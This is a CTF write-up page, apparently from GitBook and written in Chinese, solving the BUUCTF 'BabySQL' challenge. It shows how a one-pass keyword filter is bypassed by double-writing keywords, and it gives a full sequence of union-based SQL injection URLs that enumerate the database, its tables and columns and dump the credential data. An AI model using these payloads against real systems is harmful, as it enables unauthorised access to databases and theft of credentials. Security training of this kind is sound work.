👹
CTF Writeup
  • README
  • BUUCTF
    • [护网杯 2018]easy_tornado
    • [极客大挑战 2019]BuyFlag
    • [极客大挑战 2019]BabySQL
    • [ZJCTF 2019]NiZhuanSiWei
    • [BJDCTF2020]Easy MD5
    • [极客大挑战 2019]EasySQL
    • [HCTF 2018]admin
    • [极客大挑战 2019]Havefun
    • [极客大挑战 2019]Http
    • [极客大挑战 2019]HardSQL
    • [极客大挑战 2019]Knife
    • [SUCTF 2019]CheckIn
    • [极客大挑战 2019]LoveSQL
    • [极客大挑战 2019]PHP
    • [极客大挑战 2019]Secret File
    • [MRCTF2020]你传你🐎呢
    • [极客大挑战 2019]Upload
    • [网鼎杯 2020 青龙组]AreUSerialz
    • [极客大挑战 2020]Roamphp6-flagshop
    • [强网杯 2019]随便注
    • [ACTF2020 新生赛]BackupFile
    • [ACTF2020 新生赛]Exec
    • [MRCTF2020]Ez_bypass
    • [ACTF2020 新生赛]Include
    • [GXYCTF2019]Ping Ping Ping
    • [GXYCTF2019]BabySQli
    • [HCTF 2018]WarmUp
    • [RoarCTF 2019]Easy Calc
    • [GYCTF2020]Blacklist
    • [SUCTF 2019]EasySQL
    • [CISCN2019 华北赛区 Day2 Web1]Hack World
    • [网鼎杯 2018]Fakebook
  • RACTF
    • notrequired
    • madlib
    • git commit -m whatever
  • ByteCTF2021
    • double sqli
由 GitBook 提供支持
在本页
  • 一、过滤判断
  • 二、绕过
  • 三、注入

这有帮助吗?

  1. BUUCTF

[极客大挑战 2019]BabySQL

一、过滤判断

过滤关键词:and、or、union、select等

过滤方式:替换关键词为空

二、绕过

题目只进行一次关键词替换,可以嵌套双写绕过。

三、注入

  1. 判断字段数

/check.php?username=admin'oorrder+bbyy+3%23&password=admin

得到字段数:3

  1. 判断回显位置

/check.php?username=-admin'ununionion+seselectlect+1,2,3%23&password=admin

得到回显位置:2、3

  1. 获取数据库名称

/check.php?username=-admin'ununionion+seselectlect+1,2,database()%23&password=admin

得到数据库名称:geek

  1. 获取所有表

/check.php?username=0admin'ununionion+seselectlect+1,2,group_concat(table_name)+ffromrom+infoorrmation_schema.tables+whwhereere+table_schema='geek'%23&password=admin

得到:b4bsql、geekuser

  1. 获取字段

/check.php?username=0admin'ununionion+seselectlect+1,2,group_concat(column_name)+ffromrom+infoorrmation_schema.columns+whwhereere+table_name='b4bsql'%23&password=admin

得到:id、username、password

/check.php?username=0admin'ununionion+seselectlect+1,2,group_concat(column_name)+ffromrom+infoorrmation_schema.columns+whwhereere+table_name='geekuser'%23&password=admin

得到:id、username、password

  1. 获取数据

/check.php?username=0admin'ununionion+seselectlect+1,2,group_concat(id,username,passwoorrd)+ffromrom+b4bsql%23&password=admin

Get flag!

上一页[极客大挑战 2019]BuyFlag下一页[ZJCTF 2019]NiZhuanSiWei

最后更新于3年前

这有帮助吗?